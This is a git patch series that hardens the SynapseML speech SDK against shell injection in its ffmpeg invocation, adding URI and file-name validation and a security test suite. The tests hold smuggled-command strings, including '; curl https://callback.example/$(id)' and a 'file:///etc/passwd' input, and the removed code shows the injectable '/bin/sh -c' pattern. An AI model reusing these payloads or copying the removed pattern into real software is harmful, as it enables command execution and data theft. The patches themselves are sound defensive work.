From 66fb0a4dcc9280f3b82bde93415e61faf29f5329 Mon Sep 17 00:00:00 2001 From: Ranadeep Singh Date: Tue, 19 May 2026 03:13:44 -0700 Subject: [PATCH 1/6] add speechtotextsdk improvements --- .../ml/services/speech/SpeechToTextSDK.scala | 40 +++++++------ .../speech/SpeechToTextSDKSecuritySuite.scala | 57 +++++++++++++++++++ 2 files changed, 80 insertions(+), 17 deletions(-) create mode 100644 cognitive/src/test/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDKSecuritySuite.scala diff --git a/cognitive/src/main/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDK.scala b/cognitive/src/main/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDK.scala index 7596a07fa1b..5e14f4792a2 100644 --- a/cognitive/src/main/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDK.scala +++ b/cognitive/src/main/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDK.scala @@ -8,7 +8,6 @@ import com.microsoft.azure.synapse.ml.services._ import com.microsoft.azure.synapse.ml.services.speech.SpeechFormat._ import com.microsoft.azure.synapse.ml.core.contracts.HasOutputCol import com.microsoft.azure.synapse.ml.core.schema.{DatasetExtensions, SparkBindings} -import com.microsoft.azure.synapse.ml.core.utils.OsUtils import com.microsoft.azure.synapse.ml.io.http.HasURL import com.microsoft.azure.synapse.ml.logging.{FeatureNames, SynapseMLLogging} import com.microsoft.azure.synapse.ml.param.ServiceParam @@ -40,9 +39,29 @@ import scala.language.existentials object SpeechToTextSDK extends ComplexParamsReadable[SpeechToTextSDK] +private[speech] object SpeechSDKBase { + private val FfmpegOutputArgs = Seq("-acodec", "mp3", "-ab", "257k", "-f", "mp3") + + def makeFfmpegCommand(uri: String, + extraArgs: Seq[String], + recordedFileName: Option[String]): Seq[String] = { + val body = Seq("ffmpeg", "-y", + "-reconnect", "1", "-reconnect_streamed", "1", "-reconnect_delay_max", "2000", + "-i", uri) ++ extraArgs ++ FfmpegOutputArgs ++ Seq("pipe:1") + + recordedFileName match { + case Some(fn) => + require(Option(fn).exists(_.nonEmpty), "Recorded file name must be non-empty when recordAudioData is true") + body ++ FfmpegOutputArgs ++ Seq(fn) + case None => + body + } + } +} + //scalastyle:off no.finalize private[ml] class BlockingQueueIterator[T](lbq: LinkedBlockingQueue[Option[T]], - onClose: => Unit) extends Iterator[T] with Closeable { + onClose: => Unit) extends Iterator[T] with Closeable { var nextVar: Option[T] = None var isDone = false var takeAnother = true @@ -242,21 +261,8 @@ abstract class SpeechSDKBase extends Transformer dynamicParamRow: Row): (InputStream, String) = { if (isUriAudio) { //scalastyle:ignore cyclomatic.complexity val uri = row.getAs[String](getAudioDataCol) - val ffmpegCommand: Seq[String] = { - val body = Seq("ffmpeg", "-y", - "-reconnect", "1", "-reconnect_streamed", "1", "-reconnect_delay_max", "2000", - "-i", uri) ++ getExtraFfmpegArgs ++ Seq("-acodec", "mp3", "-ab", "257k", "-f", "mp3", "pipe:1") - - if (getRecordAudioData && OsUtils.IsWindows) { - val fn = row.getAs[String](getRecordedFileNameCol) - body ++ Seq("-acodec", "mp3", "-ab", "257k", "-f", "mp3", fn) - } else if (getRecordAudioData && !OsUtils.IsWindows) { - val fn = row.getAs[String](getRecordedFileNameCol) - Seq("/bin/sh", "-c", (body ++ Seq("|", "tee", fn)).mkString(" ")) - } else { - body - } - } + val recordedFileName = if (getRecordAudioData) Some(row.getAs[String](getRecordedFileNameCol)) else None + val ffmpegCommand = SpeechSDKBase.makeFfmpegCommand(uri, getExtraFfmpegArgs.toSeq, recordedFileName) val extension = FilenameUtils.getExtension(new URI(uri).getPath).toLowerCase() diff --git a/cognitive/src/test/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDKSecuritySuite.scala b/cognitive/src/test/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDKSecuritySuite.scala new file mode 100644 index 00000000000..9b4dee612b7 --- /dev/null +++ b/cognitive/src/test/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDKSecuritySuite.scala @@ -0,0 +1,57 @@ +// Copyright (C) Microsoft Corporation. All rights reserved. +// Licensed under the MIT License. See LICENSE in project root for information. + +package com.microsoft.azure.synapse.ml.services.speech + +import com.microsoft.azure.synapse.ml.core.test.base.TestBase + +class SpeechToTextSDKSecuritySuite extends TestBase { + + private val uriWithShellMetacharacters = + "https://example.com/audio.m3u8; touch /tmp/uri-owned" + private val recordedFileNameWithShellMetacharacters = + "/tmp/out.mp3; curl https://callback.example/$(id) #" + + test("recorded file names are passed to ffmpeg without a shell") { + val command = SpeechSDKBase.makeFfmpegCommand( + uriWithShellMetacharacters, + Seq("-t", "1"), + Some(recordedFileNameWithShellMetacharacters)) + + assert(command.head == "ffmpeg") + assert(!command.contains("/bin/sh")) + assert(!command.contains("-c")) + assert(!command.contains("|")) + assert(!command.contains("tee")) + assert(command.last == recordedFileNameWithShellMetacharacters) + assert(command.count(_ == recordedFileNameWithShellMetacharacters) == 1) + assert(command.forall(arg => + arg == recordedFileNameWithShellMetacharacters || !arg.contains(recordedFileNameWithShellMetacharacters))) + assert(command.contains(uriWithShellMetacharacters)) + assert(command.count(_ == uriWithShellMetacharacters) == 1) + } + + test("ffmpeg command omits recorded output when audio recording is disabled") { + val command = SpeechSDKBase.makeFfmpegCommand( + uriWithShellMetacharacters, + Seq("-t", "1"), + None) + + assert(command.head == "ffmpeg") + assert(command.last == "pipe:1") + assert(!command.contains("/bin/sh")) + assert(!command.contains("|")) + assert(!command.contains("tee")) + assert(!command.contains(recordedFileNameWithShellMetacharacters)) + } + + test("recorded file names must be non-empty") { + intercept[IllegalArgumentException] { + SpeechSDKBase.makeFfmpegCommand(uriWithShellMetacharacters, Seq(), Some("")) + } + intercept[IllegalArgumentException] { + val missingProperty = System.getProperty("synapseml.speech.recordedFileName.missing") + SpeechSDKBase.makeFfmpegCommand(uriWithShellMetacharacters, Seq(), Some(missingProperty)) + } + } +} From 14e8f3363af94e31d634c59e3534dc8c08653393 Mon Sep 17 00:00:00 2001 From: Ranadeep Singh Date: Tue, 19 May 2026 03:27:13 -0700 Subject: [PATCH 2/6] Fix ffmpeg output args --- .../azure/synapse/ml/services/speech/SpeechToTextSDK.scala | 5 +++-- .../ml/services/speech/SpeechToTextSDKSecuritySuite.scala | 7 +++++-- 2 files changed, 8 insertions(+), 4 deletions(-) diff --git a/cognitive/src/main/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDK.scala b/cognitive/src/main/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDK.scala index 5e14f4792a2..48d7ef94a5e 100644 --- a/cognitive/src/main/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDK.scala +++ b/cognitive/src/main/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDK.scala @@ -45,14 +45,15 @@ private[speech] object SpeechSDKBase { def makeFfmpegCommand(uri: String, extraArgs: Seq[String], recordedFileName: Option[String]): Seq[String] = { + val outputArgs = extraArgs ++ FfmpegOutputArgs val body = Seq("ffmpeg", "-y", "-reconnect", "1", "-reconnect_streamed", "1", "-reconnect_delay_max", "2000", - "-i", uri) ++ extraArgs ++ FfmpegOutputArgs ++ Seq("pipe:1") + "-i", uri) ++ outputArgs ++ Seq("pipe:1") recordedFileName match { case Some(fn) => require(Option(fn).exists(_.nonEmpty), "Recorded file name must be non-empty when recordAudioData is true") - body ++ FfmpegOutputArgs ++ Seq(fn) + body ++ outputArgs ++ Seq(fn) case None => body } diff --git a/cognitive/src/test/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDKSecuritySuite.scala b/cognitive/src/test/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDKSecuritySuite.scala index 9b4dee612b7..26531dee09e 100644 --- a/cognitive/src/test/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDKSecuritySuite.scala +++ b/cognitive/src/test/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDKSecuritySuite.scala @@ -11,11 +11,12 @@ class SpeechToTextSDKSecuritySuite extends TestBase { "https://example.com/audio.m3u8; touch /tmp/uri-owned" private val recordedFileNameWithShellMetacharacters = "/tmp/out.mp3; curl https://callback.example/$(id) #" + private val extraFfmpegArgs = Seq("-t", "2.5") test("recorded file names are passed to ffmpeg without a shell") { val command = SpeechSDKBase.makeFfmpegCommand( uriWithShellMetacharacters, - Seq("-t", "1"), + extraFfmpegArgs, Some(recordedFileNameWithShellMetacharacters)) assert(command.head == "ffmpeg") @@ -29,12 +30,13 @@ class SpeechToTextSDKSecuritySuite extends TestBase { arg == recordedFileNameWithShellMetacharacters || !arg.contains(recordedFileNameWithShellMetacharacters))) assert(command.contains(uriWithShellMetacharacters)) assert(command.count(_ == uriWithShellMetacharacters) == 1) + assert(command.sliding(extraFfmpegArgs.length).count(_ == extraFfmpegArgs) == 2) } test("ffmpeg command omits recorded output when audio recording is disabled") { val command = SpeechSDKBase.makeFfmpegCommand( uriWithShellMetacharacters, - Seq("-t", "1"), + extraFfmpegArgs, None) assert(command.head == "ffmpeg") @@ -43,6 +45,7 @@ class SpeechToTextSDKSecuritySuite extends TestBase { assert(!command.contains("|")) assert(!command.contains("tee")) assert(!command.contains(recordedFileNameWithShellMetacharacters)) + assert(command.sliding(extraFfmpegArgs.length).count(_ == extraFfmpegArgs) == 1) } test("recorded file names must be non-empty") { From 330ec07e515a0cb8eaa438763912a218460096fb Mon Sep 17 00:00:00 2001 From: Ranadeep Singh Date: Tue, 19 May 2026 03:39:39 -0700 Subject: [PATCH 3/6] add ffmpeg url check --- .../ml/services/speech/SpeechToTextSDK.scala | 40 ++++++++++++++----- .../speech/SpeechToTextSDKSecuritySuite.scala | 29 +++++++++++++- 2 files changed, 59 insertions(+), 10 deletions(-) diff --git a/cognitive/src/main/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDK.scala b/cognitive/src/main/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDK.scala index 48d7ef94a5e..4de4c49807e 100644 --- a/cognitive/src/main/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDK.scala +++ b/cognitive/src/main/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDK.scala @@ -32,23 +32,40 @@ import spray.json._ import java.io.{BufferedInputStream, ByteArrayInputStream, Closeable, InputStream} import java.lang.ProcessBuilder.Redirect import java.net.{URI, URL} -import java.util.UUID +import java.util.{Locale, UUID} import java.util.concurrent.{LinkedBlockingQueue, TimeUnit} import scala.concurrent.{ExecutionContext, Future, blocking} import scala.language.existentials +import scala.util.Try object SpeechToTextSDK extends ComplexParamsReadable[SpeechToTextSDK] private[speech] object SpeechSDKBase { private val FfmpegOutputArgs = Seq("-acodec", "mp3", "-ab", "257k", "-f", "mp3") + private val FfmpegProtocolWhitelist = "http,https,tcp,tls,crypto" + private val HttpSchemes = Set("http", "https") + + def parseUri(uri: String): Option[URI] = Try(new URI(uri)).toOption + + def isHttpUri(uri: URI): Boolean = + Option(uri.getScheme).map(_.toLowerCase(Locale.ROOT)).exists(HttpSchemes) + + def validateFfmpegUri(uri: String): URI = { + val parsedUri = parseUri(uri).getOrElse { + throw new IllegalArgumentException("ffmpeg input URI must be a valid http(s) URI") + } + require(isHttpUri(parsedUri), "ffmpeg input URI must use the http or https scheme") + parsedUri + } def makeFfmpegCommand(uri: String, extraArgs: Seq[String], recordedFileName: Option[String]): Seq[String] = { + validateFfmpegUri(uri) val outputArgs = extraArgs ++ FfmpegOutputArgs val body = Seq("ffmpeg", "-y", "-reconnect", "1", "-reconnect_streamed", "1", "-reconnect_delay_max", "2000", - "-i", uri) ++ outputArgs ++ Seq("pipe:1") + "-protocol_whitelist", FfmpegProtocolWhitelist, "-i", uri) ++ outputArgs ++ Seq("pipe:1") recordedFileName match { case Some(fn) => @@ -262,12 +279,17 @@ abstract class SpeechSDKBase extends Transformer dynamicParamRow: Row): (InputStream, String) = { if (isUriAudio) { //scalastyle:ignore cyclomatic.complexity val uri = row.getAs[String](getAudioDataCol) - val recordedFileName = if (getRecordAudioData) Some(row.getAs[String](getRecordedFileNameCol)) else None - val ffmpegCommand = SpeechSDKBase.makeFfmpegCommand(uri, getExtraFfmpegArgs.toSeq, recordedFileName) - - val extension = FilenameUtils.getExtension(new URI(uri).getPath).toLowerCase() - - if (Set("m3u8", "m4a")(extension) && uri.startsWith("http")) { + val parsedUriOpt = SpeechSDKBase.parseUri(uri) + val extension = parsedUriOpt + .flatMap(parsedUri => Option(parsedUri.getPath)) + .map(FilenameUtils.getExtension) + .getOrElse(FilenameUtils.getExtension(uri)) + .toLowerCase(Locale.ROOT) + val isHttpUri = parsedUriOpt.exists(SpeechSDKBase.isHttpUri) + + if (Set("m3u8", "m4a")(extension) && isHttpUri) { + val recordedFileName = if (getRecordAudioData) Some(row.getAs[String](getRecordedFileNameCol)) else None + val ffmpegCommand = SpeechSDKBase.makeFfmpegCommand(uri, getExtraFfmpegArgs.toSeq, recordedFileName) val proc = new ProcessBuilder() .redirectError(Redirect.INHERIT) .redirectInput(Redirect.INHERIT) @@ -292,7 +314,7 @@ abstract class SpeechSDKBase extends Transformer } (stream, "mp3") - } else if (uri.startsWith("http")) { + } else if (isHttpUri) { val conn = new URL(uri).openConnection conn.setConnectTimeout(5000) //scalastyle:ignore magic.number conn.setReadTimeout(5000) //scalastyle:ignore magic.number diff --git a/cognitive/src/test/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDKSecuritySuite.scala b/cognitive/src/test/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDKSecuritySuite.scala index 26531dee09e..e9252225104 100644 --- a/cognitive/src/test/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDKSecuritySuite.scala +++ b/cognitive/src/test/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDKSecuritySuite.scala @@ -8,10 +8,11 @@ import com.microsoft.azure.synapse.ml.core.test.base.TestBase class SpeechToTextSDKSecuritySuite extends TestBase { private val uriWithShellMetacharacters = - "https://example.com/audio.m3u8; touch /tmp/uri-owned" + "https://example.com/audio.m3u8;$(id)?token=$HOME" private val recordedFileNameWithShellMetacharacters = "/tmp/out.mp3; curl https://callback.example/$(id) #" private val extraFfmpegArgs = Seq("-t", "2.5") + private val ffmpegProtocolWhitelist = "http,https,tcp,tls,crypto" test("recorded file names are passed to ffmpeg without a shell") { val command = SpeechSDKBase.makeFfmpegCommand( @@ -20,6 +21,11 @@ class SpeechToTextSDKSecuritySuite extends TestBase { Some(recordedFileNameWithShellMetacharacters)) assert(command.head == "ffmpeg") + val whitelistIndex = command.indexOf("-protocol_whitelist") + assert(whitelistIndex > 0) + assert(command(whitelistIndex + 1) == ffmpegProtocolWhitelist) + assert(command(whitelistIndex + 2) == "-i") + assert(command(whitelistIndex + 3) == uriWithShellMetacharacters) assert(!command.contains("/bin/sh")) assert(!command.contains("-c")) assert(!command.contains("|")) @@ -48,6 +54,27 @@ class SpeechToTextSDKSecuritySuite extends TestBase { assert(command.sliding(extraFfmpegArgs.length).count(_ == extraFfmpegArgs) == 1) } + test("ffmpeg command rejects unsupported input protocols") { + Seq( + "file:///etc/passwd", + "concat:https://example.com/a|https://example.com/b", + "data:text/plain,hello", + "httpx://example.com/audio.m3u8", + " http://example.com/audio.m3u8" + ).foreach { uri => + intercept[IllegalArgumentException] { + SpeechSDKBase.makeFfmpegCommand(uri, Seq(), None) + } + } + } + + test("ffmpeg command accepts uppercase http schemes") { + val uri = "HTTPS://example.com/audio.m3u8" + val command = SpeechSDKBase.makeFfmpegCommand(uri, Seq(), None) + + assert(command.contains(uri)) + } + test("recorded file names must be non-empty") { intercept[IllegalArgumentException] { SpeechSDKBase.makeFfmpegCommand(uriWithShellMetacharacters, Seq(), Some("")) From ed46ef7611befe52833430f35fae8aabb34d5b3f Mon Sep 17 00:00:00 2001 From: Ranadeep Singh Date: Tue, 19 May 2026 03:44:56 -0700 Subject: [PATCH 4/6] fix: address speech recording review feedback Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .../ml/services/speech/SpeechToTextSDK.scala | 54 +++++++++++++------ .../speech/SpeechToTextSDKSecuritySuite.scala | 44 +++++++++------ 2 files changed, 68 insertions(+), 30 deletions(-) diff --git a/cognitive/src/main/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDK.scala b/cognitive/src/main/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDK.scala index 4de4c49807e..9f909379e6b 100644 --- a/cognitive/src/main/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDK.scala +++ b/cognitive/src/main/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDK.scala @@ -8,6 +8,7 @@ import com.microsoft.azure.synapse.ml.services._ import com.microsoft.azure.synapse.ml.services.speech.SpeechFormat._ import com.microsoft.azure.synapse.ml.core.contracts.HasOutputCol import com.microsoft.azure.synapse.ml.core.schema.{DatasetExtensions, SparkBindings} +import com.microsoft.azure.synapse.ml.core.utils.OsUtils import com.microsoft.azure.synapse.ml.io.http.HasURL import com.microsoft.azure.synapse.ml.logging.{FeatureNames, SynapseMLLogging} import com.microsoft.azure.synapse.ml.param.ServiceParam @@ -17,6 +18,7 @@ import com.microsoft.cognitiveservices.speech.transcription.{Conversation, Conve ConversationTranscriptionEventArgs, Participant} import com.microsoft.cognitiveservices.speech.util.EventHandler import org.apache.commons.io.FilenameUtils +import org.apache.commons.io.input.TeeInputStream import org.apache.hadoop.fs.Path import org.apache.spark.broadcast.Broadcast import org.apache.spark.injections.SConf @@ -29,7 +31,7 @@ import org.apache.spark.sql.types._ import org.apache.spark.sql.{DataFrame, Dataset, Row} import spray.json._ -import java.io.{BufferedInputStream, ByteArrayInputStream, Closeable, InputStream} +import java.io.{BufferedInputStream, ByteArrayInputStream, Closeable, FileOutputStream, IOException, InputStream} import java.lang.ProcessBuilder.Redirect import java.net.{URI, URL} import java.util.{Locale, UUID} @@ -44,6 +46,8 @@ private[speech] object SpeechSDKBase { private val FfmpegOutputArgs = Seq("-acodec", "mp3", "-ab", "257k", "-f", "mp3") private val FfmpegProtocolWhitelist = "http,https,tcp,tls,crypto" private val HttpSchemes = Set("http", "https") + private val UriSchemePattern = "^[A-Za-z][A-Za-z0-9+.-]*:.*".r + private val WindowsDrivePathPattern = "^[A-Za-z]:[\\\\/].*".r def parseUri(uri: String): Option[URI] = Try(new URI(uri)).toOption @@ -58,22 +62,27 @@ private[speech] object SpeechSDKBase { parsedUri } + def validateRecordedFileName(fileName: String): String = { + val fn = Option(fileName).filter(_.trim.nonEmpty).getOrElse { + throw new IllegalArgumentException("Recorded file name must be non-empty when recordAudioData is true") + } + val hasUriScheme = UriSchemePattern.pattern.matcher(fn).matches() + val isWindowsDrivePath = WindowsDrivePathPattern.pattern.matcher(fn).matches() + + require(!fn.startsWith("-"), "Recorded file name must not start with '-'") + require(!fn.contains('\u0000'), "Recorded file name must not contain NUL characters") + require(!hasUriScheme || (OsUtils.IsWindows && isWindowsDrivePath), + "Recorded file name must be a local file path without a URI scheme") + fn + } + def makeFfmpegCommand(uri: String, - extraArgs: Seq[String], - recordedFileName: Option[String]): Seq[String] = { + extraArgs: Seq[String]): Seq[String] = { validateFfmpegUri(uri) val outputArgs = extraArgs ++ FfmpegOutputArgs - val body = Seq("ffmpeg", "-y", + Seq("ffmpeg", "-y", "-reconnect", "1", "-reconnect_streamed", "1", "-reconnect_delay_max", "2000", "-protocol_whitelist", FfmpegProtocolWhitelist, "-i", uri) ++ outputArgs ++ Seq("pipe:1") - - recordedFileName match { - case Some(fn) => - require(Option(fn).exists(_.nonEmpty), "Recorded file name must be non-empty when recordAudioData is true") - body ++ outputArgs ++ Seq(fn) - case None => - body - } } } @@ -288,14 +297,29 @@ abstract class SpeechSDKBase extends Transformer val isHttpUri = parsedUriOpt.exists(SpeechSDKBase.isHttpUri) if (Set("m3u8", "m4a")(extension) && isHttpUri) { - val recordedFileName = if (getRecordAudioData) Some(row.getAs[String](getRecordedFileNameCol)) else None - val ffmpegCommand = SpeechSDKBase.makeFfmpegCommand(uri, getExtraFfmpegArgs.toSeq, recordedFileName) + val recordedFileName = if (getRecordAudioData) { + Some(SpeechSDKBase.validateRecordedFileName(row.getAs[String](getRecordedFileNameCol))) + } else { + None + } + val ffmpegCommand = SpeechSDKBase.makeFfmpegCommand(uri, getExtraFfmpegArgs.toSeq) val proc = new ProcessBuilder() .redirectError(Redirect.INHERIT) .redirectInput(Redirect.INHERIT) .command(ffmpegCommand: _*) .start() - val stream = proc.getInputStream + val stream = recordedFileName match { + case Some(fn) => + try { + new TeeInputStream(proc.getInputStream, new FileOutputStream(fn), true) + } catch { + case e: IOException => + proc.destroy() + throw e + } + case None => + proc.getInputStream + } if (getExtraFfmpegArgs.contains("-t")) { val timeLimit = getExtraFfmpegArgs(getExtraFfmpegArgs.indexOf("-t") + 1).toInt diff --git a/cognitive/src/test/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDKSecuritySuite.scala b/cognitive/src/test/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDKSecuritySuite.scala index e9252225104..7770b1cf816 100644 --- a/cognitive/src/test/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDKSecuritySuite.scala +++ b/cognitive/src/test/scala/com/microsoft/azure/synapse/ml/services/speech/SpeechToTextSDKSecuritySuite.scala @@ -14,11 +14,10 @@ class SpeechToTextSDKSecuritySuite extends TestBase { private val extraFfmpegArgs = Seq("-t", "2.5") private val ffmpegProtocolWhitelist = "http,https,tcp,tls,crypto" - test("recorded file names are passed to ffmpeg without a shell") { + test("audio streams are passed to ffmpeg without a shell") { val command = SpeechSDKBase.makeFfmpegCommand( uriWithShellMetacharacters, - extraFfmpegArgs, - Some(recordedFileNameWithShellMetacharacters)) + extraFfmpegArgs) assert(command.head == "ffmpeg") val whitelistIndex = command.indexOf("-protocol_whitelist") @@ -30,20 +29,16 @@ class SpeechToTextSDKSecuritySuite extends TestBase { assert(!command.contains("-c")) assert(!command.contains("|")) assert(!command.contains("tee")) - assert(command.last == recordedFileNameWithShellMetacharacters) - assert(command.count(_ == recordedFileNameWithShellMetacharacters) == 1) - assert(command.forall(arg => - arg == recordedFileNameWithShellMetacharacters || !arg.contains(recordedFileNameWithShellMetacharacters))) + assert(!command.contains(recordedFileNameWithShellMetacharacters)) assert(command.contains(uriWithShellMetacharacters)) assert(command.count(_ == uriWithShellMetacharacters) == 1) - assert(command.sliding(extraFfmpegArgs.length).count(_ == extraFfmpegArgs) == 2) + assert(command.sliding(extraFfmpegArgs.length).count(_ == extraFfmpegArgs) == 1) } - test("ffmpeg command omits recorded output when audio recording is disabled") { + test("ffmpeg command writes only to stdout") { val command = SpeechSDKBase.makeFfmpegCommand( uriWithShellMetacharacters, - extraFfmpegArgs, - None) + extraFfmpegArgs) assert(command.head == "ffmpeg") assert(command.last == "pipe:1") @@ -63,25 +58,44 @@ class SpeechToTextSDKSecuritySuite extends TestBase { " http://example.com/audio.m3u8" ).foreach { uri => intercept[IllegalArgumentException] { - SpeechSDKBase.makeFfmpegCommand(uri, Seq(), None) + SpeechSDKBase.makeFfmpegCommand(uri, Seq()) } } } test("ffmpeg command accepts uppercase http schemes") { val uri = "HTTPS://example.com/audio.m3u8" - val command = SpeechSDKBase.makeFfmpegCommand(uri, Seq(), None) + val command = SpeechSDKBase.makeFfmpegCommand(uri, Seq()) assert(command.contains(uri)) } + test("recorded file names are validated as local paths") { + assert(SpeechSDKBase.validateRecordedFileName(recordedFileNameWithShellMetacharacters) == + recordedFileNameWithShellMetacharacters) + + Seq( + "-out.mp3", + "http://example.com/out.mp3", + "https://example.com/out.mp3", + "file:///tmp/out.mp3", + "pipe:1", + "data:text/plain,hello", + "concat:/tmp/a|/tmp/b" + ).foreach { fileName => + intercept[IllegalArgumentException] { + SpeechSDKBase.validateRecordedFileName(fileName) + } + } + } + test("recorded file names must be non-empty") { intercept[IllegalArgumentException] { - SpeechSDKBase.makeFfmpegCommand(uriWithShellMetacharacters, Seq(), Some("")) + SpeechSDKBase.validateRecordedFileName("") } intercept[IllegalArgumentException] { val missingProperty = System.getProperty("synapseml.speech.recordedFileName.missing") - SpeechSDKBase.makeFfmpegCommand(uriWithShellMetacharacters, Seq(), Some(missingProperty)) + SpeechSDKBase.validateRecordedFileName(missingProperty) } } } From fccce86149476005b0506e7562e81eb3ef1f620b Mon Sep 17 00:00:00 2001 From: Ranadeep Singh Date: Tue, 19 May 2026 13:52:35 -0700 Subject: [PATCH 5/6] test: make OpenAIPrompt RAI test resilient Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .../synapse/ml/services/openai/OpenAIPromptSuite.scala | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/cognitive/src/test/scala/com/microsoft/azure/synapse/ml/services/openai/OpenAIPromptSuite.scala b/cognitive/src/test/scala/com/microsoft/azure/synapse/ml/services/openai/OpenAIPromptSuite.scala index 35b425c973b..35387a42b09 100644 --- a/cognitive/src/test/scala/com/microsoft/azure/synapse/ml/services/openai/OpenAIPromptSuite.scala +++ b/cognitive/src/test/scala/com/microsoft/azure/synapse/ml/services/openai/OpenAIPromptSuite.scala @@ -113,16 +113,15 @@ class OpenAIPromptSuite extends TransformerFuzzing[OpenAIPrompt] with OpenAIAPIK // scalastyle:on null test("RAI Usage") { - val result = prompt + val results = prompt .setDeploymentName(deploymentName) .setPromptTemplate("Tell me about a graphically disgusting " + "and violent movie in detail, " + "be very gory and NSFW in your description.") .transform(df) - .where(col(prompt.getErrorCol).isNotNull) - .select(prompt.getErrorCol) - .collect().head.getAs[Row](0) - assert(Option(result).nonEmpty) + .select(prompt.getOutputCol, prompt.getErrorCol) + .collect() + assert(results.exists(row => !row.isNullAt(0) || !row.isNullAt(1))) } test("Basic Usage") { From fc0a9ead9461ff0b369d7efe4640d683b08f8115 Mon Sep 17 00:00:00 2001 From: Ranadeep Singh Date: Tue, 19 May 2026 19:41:01 -0700 Subject: [PATCH 6/6] Revert "test: make OpenAIPrompt RAI test resilient" This reverts commit fccce86149476005b0506e7562e81eb3ef1f620b. --- .../synapse/ml/services/openai/OpenAIPromptSuite.scala | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/cognitive/src/test/scala/com/microsoft/azure/synapse/ml/services/openai/OpenAIPromptSuite.scala b/cognitive/src/test/scala/com/microsoft/azure/synapse/ml/services/openai/OpenAIPromptSuite.scala index 35387a42b09..35b425c973b 100644 --- a/cognitive/src/test/scala/com/microsoft/azure/synapse/ml/services/openai/OpenAIPromptSuite.scala +++ b/cognitive/src/test/scala/com/microsoft/azure/synapse/ml/services/openai/OpenAIPromptSuite.scala @@ -113,15 +113,16 @@ class OpenAIPromptSuite extends TransformerFuzzing[OpenAIPrompt] with OpenAIAPIK // scalastyle:on null test("RAI Usage") { - val results = prompt + val result = prompt .setDeploymentName(deploymentName) .setPromptTemplate("Tell me about a graphically disgusting " + "and violent movie in detail, " + "be very gory and NSFW in your description.") .transform(df) - .select(prompt.getOutputCol, prompt.getErrorCol) - .collect() - assert(results.exists(row => !row.isNullAt(0) || !row.isNullAt(1))) + .where(col(prompt.getErrorCol).isNotNull) + .select(prompt.getErrorCol) + .collect().head.getAs[Row](0) + assert(Option(result).nonEmpty) } test("Basic Usage") {